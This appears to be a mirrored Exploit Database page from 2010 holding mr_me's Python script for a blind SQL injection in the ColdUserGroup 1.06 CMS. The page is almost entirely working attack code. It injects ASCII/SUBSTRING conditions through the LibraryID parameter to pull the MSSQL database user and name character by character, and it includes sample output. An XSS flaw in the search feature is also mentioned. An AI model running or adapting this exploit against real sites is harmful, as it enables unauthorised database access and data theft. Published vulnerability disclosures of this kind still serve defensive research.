ColdUserGroup 1.06 – Blind SQL Injection

• Exploit Database
• 107 阅读

• 作者： mr_me
  日期： 2010-09-07
• 类别：

  • webapps
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/14935/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125

  #!/usr/bin/python # ColdGen - coldusergroup v1.06 0day Remote Blind SQL Injection Exploit # Vendor: http://www.coldgen.com/ # Found by: mr_me # -----------------------------------------------> # Script provided &apos;as is&apos;, without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # -----------------------------------------------> # The vulnerabilities: # =================== # - Blind SQL Injection in the index.cfm using parameters: ArticleID & LibraryID # - XSS in the search # # This tool assumes the target has a MSSQL backend. # ./ColdUsrGrp0day.py -p localhost:8080 -s "Author:" -t localhost:8500 -d /coldusrgrp/ # # | ----------------------------------------------------------------- | # |-= ColdUserGroup v1.6 0day Remote Blind SQL Injection Exploit =- | # | -------------------[ by mr_me - net-ninja.net ]------------------ | # # (+) Exploiting target @: http://localhost:8500/coldusrgrp/ # (+) Using string &apos;Author:&apos; for the true page # (+) This will take time, have patience.. # # (+) Testing Proxy... # (+) Proxy @ localhost:8080 # (+) Building Handler.. # # (!) Getting database user: sa # (!) Getting database name: coldusergroup   import sys, urllib, re from optparse import OptionParser   usage = "./%prog [<options>] -s [true string] -t [target] -d [directory]" usage += "\nExample: ./%prog -p localhost:8080 -s &apos;Author:&apos; -t localhost:8500 -d /coldusrgrp/"   parser = OptionParser(usage=usage) parser.add_option("-p", type="string",action="store", dest="proxy", help="HTTP Proxy <server:port>") parser.add_option("-t", type="string", action="store", dest="target", help="The Target server <server:port>") parser.add_option("-d", type="string", action="store", dest="directory", help="Directory path to the CMS") parser.add_option("-s", type="string", action="store", dest="trueStr", help="String that is on the &apos;true&apos; page") (options, args) = parser.parse_args()   def banner(): print "\n\t| ----------------------------------------------------------------- |" print "\t|-= ColdUserGroup v1.6 0day Remote Blind SQL Injection Exploit =- |" print "\t| -------------------[ by mr_me - net-ninja.net ]------------------ |\n"   if len(sys.argv) < 5: banner() parser.print_help() sys.exit(1)   def setTargetHTTP(): if options.target[0:7] != &apos;http://&apos;: options.target = "http://" + options.target return options.target def getProxy(): try: proxy = {&apos;http&apos;: "http://"+options.proxy} opener = urllib.FancyURLopener(proxy) except(socket.timeout): print "\n(-) Proxy Timed Out" sys.exit(1) except(),msg: print "\n(-) Proxy Failed" sys.exit(1) return opener def getRequest(exploit): if options.proxy: try: options.target = setTargetHTTP() opener = getProxy() check = opener.open(options.target+options.directory+exploit).read() except urllib.error.HTTPError, error: check = error.read() except socket.error: print "(-) Proxy connection failed" sys.exit(1) else: try: check = urllib.urlopen(options.target+options.directory+exploit).read() except urllib.error.HTTPError, error: check = error.read() except urllib.error.URLError: print "(-) Target connection failed, check your address" sys.exit(1) return check   basicInfo = {&apos;user&apos;:&apos;user_name(0)&apos;, &apos;name&apos;:&apos;db_name(0)&apos;}   def getBasicInfo(info, x): for i in range(32,126): request = ("index.cfm?actcfug=LibraryView&LibraryID=209+AND+ISNULL" "(ASCII(SUBSTRING(CAST((SELECT+LOWER("+info+"))AS+varchar(8000)),"+str(x)+",1)),0)="+str(i)) result = getRequest(request) if re.search(options.trueStr,result): x = x+1 sys.stdout.write(chr(i)) getBasicInfo(info, x) if __name__ == "__main__": x = 1 banner() options.target = setTargetHTTP() print "(+) Exploiting target @: %s" % (options.target+options.directory) print "(+) Using string &apos;%s&apos; for the true page" % (options.trueStr) print "(+) This will take time, have patience.." if options.proxy: print "\n(+) Testing Proxy..." print "(+) Proxy @ %s" % (options.proxy) print "(+) Building Handler.."   for key in basicInfo: sys.stdout.write("\n(!) Getting database " + key + ": ") getBasicInfo(basicInfo[key], x)